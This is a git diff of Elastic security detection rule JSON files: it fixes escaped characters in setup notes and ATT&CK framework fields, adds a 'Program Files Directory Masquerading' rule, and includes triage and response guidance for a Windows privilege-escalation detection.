!{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_103.json b/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_103.json index fff4d415f25..97c42bf176f 100644 --- a/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_103.json +++ b/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_104.json b/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_104.json index 74054fc25ea..b1ca57a5d3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_104.json +++ b/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_101.json b/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_101.json index c8b5c37991e..4de912b023e 100644 --- a/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_101.json +++ b/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_102.json b/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_102.json index 8a68b369ab8..ad1c34e6456 100644 --- a/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_102.json +++ b/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_100.json b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_100.json index 8439c128e07..4e5a3672854 100644 --- a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_100.json +++ b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_100.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_101.json b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_101.json index 2ada57b08b4..bb8947f80e4 100644 --- a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_101.json +++ b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_101.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_102.json b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_102.json index 37e360b35c0..fda9e10705b 100644 --- a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_102.json +++ b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_102.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_103.json b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_103.json index 2761d0084a0..24f9b96b6af 100644 --- a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_103.json +++ b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_103.json b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_103.json index cc9daf663f7..f902fed3183 100644 --- a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_103.json +++ b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_103.json @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_104.json b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_104.json index a7e9f239006..8e5f0ec802f 100644 --- a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_104.json +++ b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_104.json @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_105.json b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_105.json index d3059ad2650..3149481f2d7 100644 --- a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_105.json +++ b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_105.json @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_106.json b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_106.json index 3c490b799b3..30642820a85 100644 --- a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_106.json +++ b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_106.json @@ -44,7 +44,7 @@ ], "risk_score": 47, "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_107.json b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_107.json new file mode 100644 index 00000000000..5ff146ee717 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_107.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution from a directory masquerading as the Windows Program Files directories. These paths are trusted and usually host trusted third party programs. An adversary may leverage masquerading, along with low privileges to bypass detections allowlisting those folders.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Program Files Directory Masquerading", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : \"C:\\\\*Program*Files*\\\\*.exe\" and\n not process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Downloaded Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\.opera\\\\????????????\\\\CProgram?FilesOpera*\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\.opera\\\\????????????\\\\CProgram?Files?(x86)Opera*\\\\*.exe\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_104.json b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_104.json index 3b69ff52df3..befc66907cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_104.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_105.json b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_105.json index 2334347f079..e77d667cf91 100644 --- a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_105.json +++ b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_105.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_106.json b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_106.json index 4414abf452c..07188742b3e 100644 --- a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_106.json +++ b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_106.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_107.json b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_107.json index b7b41c1d7b1..d922b723dbf 100644 --- a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_107.json +++ b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_107.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_108.json b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_108.json index 826d783a476..2d90aac2aaa 100644 --- a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_108.json +++ b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_108.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_105.json b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_105.json index b874c7e4214..9a9f02dc445 100644 --- a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_105.json +++ b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_105.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -77,7 +77,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_106.json b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_106.json index 427a9993f09..95180248416 100644 --- a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_106.json +++ b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -74,7 +74,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_107.json b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_107.json index 6c74a8f9630..2f3462e9b6c 100644 --- a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_107.json +++ b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_107.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -74,7 +74,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_208.json b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_208.json index f7ec4439986..be05688c066 100644 --- a/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_208.json +++ b/packages/security_detection_engine/kibana/security_rule/333de828-8190-4cf5-8d7c-7575846f6fe0_208.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -74,7 +74,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_1.json b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_1.json index 07cbcd25709..662e96f75c5 100644 --- a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_1.json +++ b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_2.json b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_2.json index 4718e263183..78852080d8e 100644 --- a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_2.json +++ b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_2.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_3.json b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_3.json index e5e2de4d5dd..610036deda8 100644 --- a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_3.json +++ b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_3.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_4.json b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_4.json index ad10f37fe0b..67bdd21a3e0 100644 --- a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_4.json +++ 